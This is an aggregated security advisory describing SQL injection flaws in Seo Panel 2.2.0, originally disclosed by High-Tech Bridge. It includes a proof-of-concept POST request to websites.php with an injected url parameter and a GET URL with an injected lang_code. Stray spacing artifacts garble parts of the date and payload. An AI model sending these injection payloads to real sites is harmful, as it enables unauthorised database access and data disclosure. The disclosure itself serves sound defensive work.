Seo Panel 2.2.0 SQL injection vulnerabilities-vulnerability warning-the black bar safety net

2011-02-16T00:00:00
ID MYHACK58:62201129183
Type myhack58
Reporter 佚名
Modified 2011-02-16T00:00:00

Description

Seo Panel is a site management and SEO system, Seo Panel 2.2.0 of the websites. php and index. php existsSQL injectionvulnerabilities that could lead to sensitive information disclosure.

[+]info: ~~~~~~~~~ Seo Panel 2.2.0 SQL Injection Vulnerabilities Product: Seo Panel Vendor: http://www.seopanel.in/ ( http://www.seopanel.in/ ) Vulnerable Version: 2.2.0 Vendor Notification: 0 1 February 2 0 1 1 Vulnerability Type: SQL Injection Risk level: High Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/)

[+]poc: ~~~~~~~~~ The following PoC is available: POST /websites.php HTTP/1.1

sec=create&name=1 2 3&url=http%3A%2F%2F123'%2Cversion()%2C1%2C1%2C2%2C1)%2 0--%2 0&title=1&description=1&keywords=1

http://[host]/index. php?& amp;lang_code=1%27SQL_CODE_HERE

[+]Reference: ~~~~~~~~~ http://www.htbridge.ch/advisory/sql_injection_in_seo_panel_1.html http://www.htbridge.ch/advisory/sql_injection_in_seo_panel.html